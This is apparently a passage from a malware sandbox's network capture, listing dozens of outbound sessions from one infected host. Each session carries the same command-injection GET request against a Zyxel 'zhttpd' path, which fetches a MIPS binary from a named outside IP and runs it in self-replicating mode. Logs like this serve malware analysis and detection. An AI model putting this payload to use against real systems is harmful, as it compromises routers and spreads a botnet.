                                          Jan 14, 2024 15:46:03.751519918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1439192.168.2.2355940112.253.134.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751555920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1440192.168.2.234730652.123.61.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751576900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1441192.168.2.2334138112.88.52.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751612902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1442192.168.2.2343996222.106.253.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751631975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1443192.168.2.235111252.0.45.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751681089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1444192.168.2.234773834.38.151.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751689911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1445192.168.2.234104617.41.101.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751718044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1446192.168.2.2342660173.132.162.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751729965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1447192.168.2.235959227.144.228.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751760960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1448192.168.2.233644465.131.189.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751777887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1449192.168.2.2343104119.228.20.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751795053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1450192.168.2.2332920208.47.34.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751828909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1451192.168.2.2338854157.177.17.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751849890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1452192.168.2.233693275.209.249.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751869917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1453192.168.2.2360072116.81.38.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751899958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1454192.168.2.2352734113.158.176.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751926899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1455192.168.2.235502486.253.140.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751943111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1456192.168.2.2335688203.134.94.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751976967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1457192.168.2.234577475.109.60.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752015114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1458192.168.2.2334662177.122.12.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752033949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1459192.168.2.234039612.93.17.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752058983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1460192.168.2.2342258218.205.220.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752099037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1461192.168.2.2332996197.11.217.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752146006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1462192.168.2.2339728115.117.71.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752150059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1463192.168.2.235670224.66.39.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752152920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1464192.168.2.23483661.143.51.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752197981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1465192.168.2.2335152136.41.151.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752202034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1466192.168.2.2348652218.139.171.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752202034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1467192.168.2.2359340203.23.23.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752254009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1468192.168.2.234577818.72.133.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752259970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1469192.168.2.235641035.19.169.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752259970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1470192.168.2.2339706142.209.8.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752334118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1471192.168.2.2335640204.72.66.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752356052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1472192.168.2.233767643.183.247.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752372026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1473192.168.2.2339014172.46.194.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752399921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1474192.168.2.235107235.156.216.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752430916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1475192.168.2.235815445.244.123.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752463102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1476192.168.2.2342568166.210.108.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752489090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1477192.168.2.235818676.78.82.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752512932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1478192.168.2.2347660112.16.150.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752532005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1479192.168.2.2350842119.229.186.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752549887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1480192.168.2.2356184170.7.38.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752582073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1481192.168.2.234322883.168.209.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752590895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1482192.168.2.235504866.255.161.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752620935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1483192.168.2.233609045.253.253.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752620935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1484192.168.2.2345266132.179.220.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752660036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1485192.168.2.2339544149.236.160.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752698898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1486192.168.2.2351516169.47.201.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752742052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1487192.168.2.2360380105.71.117.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752773046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1488192.168.2.2359278144.134.83.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752787113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1489192.168.2.2351980128.149.215.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752809048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1490192.168.2.2358816209.97.212.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752830982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1491192.168.2.2341570206.214.70.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752856970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1492192.168.2.2360622173.101.106.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752881050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1493192.168.2.2356000186.121.1.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752913952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1494192.168.2.2346422184.3.238.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752949953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1495192.168.2.2355092139.90.15.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752974033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1496192.168.2.2350806128.106.61.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.752986908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1497192.168.2.235063274.233.95.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.753015995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1498192.168.2.2350458119.113.86.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.753035069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1499192.168.2.2360604134.167.248.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.755312920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1500192.168.2.2357590102.197.142.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.755820990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1501192.168.2.2342568104.78.54.26443
                                          TimestampBytes transferredDirectionData
